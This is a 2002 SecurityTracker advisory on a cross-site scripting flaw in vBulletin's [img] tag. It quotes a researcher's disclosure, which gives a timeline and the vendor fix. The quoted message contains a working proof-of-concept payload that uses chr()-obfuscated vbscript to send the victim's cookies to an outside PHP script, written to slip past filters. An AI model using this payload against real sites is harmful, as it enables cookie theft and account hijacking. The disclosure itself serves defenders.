SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Forum/Board/Portal)  >   vBulletin Vendors:   Jelsoft Enterprises
vBulletin Forum Software Lets Remote Users Conduct Cross-Site Scripting Attacks
SecurityTracker Alert ID:  1003869
SecurityTracker URL:  http://securitytracker.com/id/1003869
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Mar 21 2002
Impact:   Disclosure of authentication information, Execution of arbitrary code via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): prior to 2.2.3
Description:   A vulnerability was reported in the vBulletin bulletin board software. A remote user can conduct cross-site scripting attacks against other vBulletin users.

It is reported that a remote user can inject scripting code in posts and in private messages within an IMG tag (which is apparently enabled, by default). When the target (victim) user views the message, the code will be executed on the target user's browser. The code will originate from the system running vBulletin and will run in the security context of that system. As a result, the code will be able to access the target user's cookies associated with the vBulletin site.

Some demonstration exploit code is included in the Source Message.

Impact:   A remote user can cause arbitrary javascript to be executed in a target user's browser. The code will be able to access the target user's cookies associated with the site running the vBulletin software.
Solution:   The vendor has reportedly released a fixed version (2.2.4). See the Vendor URL for more information.
Vendor URL:  www.vbulletin.com/ (Links to External Site)
Cause:   Input validation error
Underlying OS:  Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  [img]-vulnerability in vBulletin Version 2.2.2 & 2.2.1 & maybe olders


Hi

I've discovered a vulnerability in the vBulletins's [img]-Tag
implementation,
that allows users to inject vbs-code in posts and private messages
([img] is switched on by default).
Through that, an attacker is able to steal other users cookies and
maybe hijack their accounts.

The following code sends the user's cookie to a php-script
(http://www.ignite.barrysworld.net/test.php?c= in this case, which
just prints it back to the browser)
It is enclosed in [code]-Tag, the url is encoded in ascii and
linebreaks are inserted to avoid filtering of some characters and
insertion of <br>-Tags

[code][img]vbscript:location.replace(
chr(104)+chr(116)+chr(116)+chr(112)+chr(58)+
chr(47)+chr(47)+chr(119)+chr(119)+chr(119)+
chr(46)+chr(105)+chr(103)+chr(110)+chr(105)+
chr(116)+chr(101)+chr(46)+chr(98)+chr(97)+
chr(114)+chr(114)+chr(121)+chr(115)+chr(119)+
chr(111)+chr(114)+chr(108)+chr(100)+chr(46)+
chr(110)+chr(101)+chr(116)+chr(47)+chr(116)+
chr(101)+chr(115)+chr(116)+chr(46)+chr(112)+
chr(104)+chr(112)+chr(63)+chr(99)+chr(61)+
escape(document.cookie)
)[/img][/code]
  

History:
 Feb 19 02: contacted Jelsoft
 Feb 20 02: Vendor confirmed the bug
 Feb 21 02: Jelsoft claimed to have made a patch "which clamps
            down on what characters are allowed in an [img] tag,
            as well as requiring it to start with http://".
            Sounds good ;)


 vBulletin 2.2.3 & 2.2.4 are out for some weeks, but there are still
 sites using vulnerable versions, so better update!
 

lates, Cano2                          mailto:Cano2@buhaboard.de

--

BuHa-Security Board
www.buhaboard.de


 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC